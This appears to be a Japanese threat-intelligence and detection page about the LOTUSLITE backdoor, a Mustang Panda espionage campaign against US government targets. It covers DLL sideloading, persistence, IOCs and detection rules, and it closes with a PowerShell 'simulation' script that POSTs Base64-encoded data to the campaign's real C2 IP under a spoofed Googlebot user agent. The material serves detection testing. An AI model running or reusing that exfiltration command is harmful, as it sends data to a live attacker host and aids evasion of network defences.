フォローする
概要
Acronis TRUは、米国政府機関を標的とするスパイ活動を観測し、政治テーマのZIPアーカイブ内に悪意のあるDLLバックドア、 LOTUSLITE、を配信しました。コンパニオンローダー実行ファイルがDLLをサイドロードし、その後、バックドアはHTTPSを介してGooglebotユーザーエージェントを偽装してハードコードされたC2エンドポイントにビーコンを送信します。運用者は専用のProgramDataディレクトリを作成し、Runレジストリエントリを追加することで持続性を確立します。重複する戦術に基づいて、この活動はMustang Pandaに関連付けられました。
調査
アナリストはZIPファイルを解凍し、武器化されたDLL(kugou.dll)と並んでローダーバイナリ(Maduro to be taken to New York.exe)を特定しました。分析はDLLサイドロードフロー、ビーコン動作、Mutexの使用、ホスト上で作成された正確な持続化アーティファクトを文書化しました。インフラストラクチャのレビューにより、通信が単一のIPアドレス(172.81.60.97)およびアリゾナ州フェニックスにホストされているとされるspryt.netホストのドメインに帰属していることが判明しました。Mustang Pandaへの帰属は、共有された戦術およびインフラストラクチャパターンにより中程度の信頼性で評価されました。
緩和策
Acronisの検出は、悪意のあるバイナリのSHA-256ハッシュに依存し、特定のProgramData持続フォルダーとRunキーの場所を強調しました。ネットワーク制御は、Googlebotユーザーエージェント文字列と組み合わせた場合に、特定されたIP/ドメインへのアウトバウンドHTTPS接続にフラグを立てるべきです。ProgramDataからの未知のバイナリの実行を防止し、発見時に関連するRunレジストリエントリを削除することで持続性を減少させます。
対応
影響を受けたエンドポイントを直ちに隔離し、揮発性データをキャプチャし、悪意のあるバイナリを分析のために保存します。作成されたProgramDataフォルダーを削除し、対応するRunレジストリ値を削除して持続性を断ち切ります。C2 IPとドメインへの接続をブロックし、提供されたファイルハッシュやMutexインジケーターでエンドポイント検出を更新してください。最後に、同じローダーおよびDLLシグニチャを示す追加のホストを探して環境全体でハントを実行します。
graph TB classDef technique fill:#ffcc99 initial_access[“<b>技術</b> – <b>T1566.001 添付ファイル型スピアフィッシング</b><br/>実行可能なローダーと悪意のあるDLLを含むZIPファイルを配布。”] execution[“<b>技術</b> – <b>T1574.001 実行フローのハイジャック: DLL</b><br/>ローダーが <i>kugou.dll</i> をバックドアとしてサイドロードする。”] defense_evasion1[“<b>技術</b> – <b>T1036 偽装</b><br/>ファイル名を \”Maduro to be taken to New York.exe\” および \”kugou.dll\” に変更して正規ソフトを装う。”] defense_evasion2[“<b>技術</b> – <b>T1036.003 正規ユーティリティの名前変更</b><br/>Tencent Musicの既知のツール名を使用して隠蔽。”] discovery[“<b>技術</b> – <b>T1033 ユーザー/システム情報の取得</b><br/>GetComputerName と GetUserName を使用して情報を収集。”] command_exec[“<b>技術</b> – <b>T1059.003 Windowsコマンドシェル</b><br/>匿名パイプ経由で <i>cmd.exe</i> を起動。”] persistence[“<b>技術</b> – <b>T1037.001 ログオンスクリプト</b><br/><i>C:\\ProgramData\\Technology360NB</i> を作成し、<i>DataTechnology.exe</i> を登録、HKCUに <i>Lite360</i> を追加。”] c2[“<b>技術</b> – <b>T1102 Webサービス</b> / <b>T1102.002 双方向通信</b> / <b>T1071.001 Webプロトコル</b><br/>WinHTTPを使用して https://172.81.60.97:443 にPOST通信。”] initial_access –>|につながる| execution execution –>|可能にする| defense_evasion1 defense_evasion1 –>|支援する| defense_evasion2 defense_evasion2 –>|提供する| discovery discovery –>|可能にする| command_exec command_exec –>|促進する| persistence persistence –>|確立する| c2
攻撃フロー
検出
持続性ポイントの可能性 [ASEPs – Software/NTUSER Hive](レジストリエベント経由)
見る
検出するためのIOC(SourceIP):LOTUSLITE:地政学的なテーマを活用した標的型スパイ活動
見る
検出するためのIOC(DestinationIP):LOTUSLITE:地政学的なテーマを活用した標的型スパイ活動
見る
検出するためのIOC(HashSha256):LOTUSLITE:地政学的なテーマを活用した標的型スパイ活動
見る
LOTUSLITEバックドアC2通信の検出 [Windowsネットワーク接続]
見る
LOTUSLITEバックドアを使用した標的型スパイ活動キャンペーン [Windowsプロセス作成]
見る
シミュレーション実行
前提条件:テレメトリー&ベースラインの事前飛行チェックが合格している必要があります。
根拠:このセクションでは、検出ルールを引き起こすように設計された敵の技術(TTP)の正確な実行を詳細に説明します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。
-
攻撃の流れとコマンド:
攻撃者はワークステーションを侵害し、LOTUSLITEバックドアをインストールしました。合法的なウェブクローラーのトラフィックに紛れ込みデータを流出させるため、このバックドアはハードコードされたC2サーバーにHTTP POSTを発行します。172.81.60.97。ユーザーエージェントヘッダーは明示的に「Googlebot」に設定され、検索エンジンクローラーとして偽装し、そのようなエージェントをホワイトリスト化する周辺防御を通り抜けようとしています。ペイロードにはBase64でエンコードされた流出データが含まれています。 -
回帰テストスクリプト:
# LOTUSLITE C2シミュレーション – PowerShell $c2 = "http://172.81.60.97/receive" $ua = "Googlebot" $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload")) $body = @{ "data" = $data } try { Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing Write-Host "C2 request sent successfully." } catch { Write-Error "C2 request failed: $_" } -
クリーンアップコマンド:
# 一時ファイルや残っているネットワーク接続を削除 Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue # (このシミュレーションでは永続的なサービスは作成されませんでした) Write-Host "Clean up complete."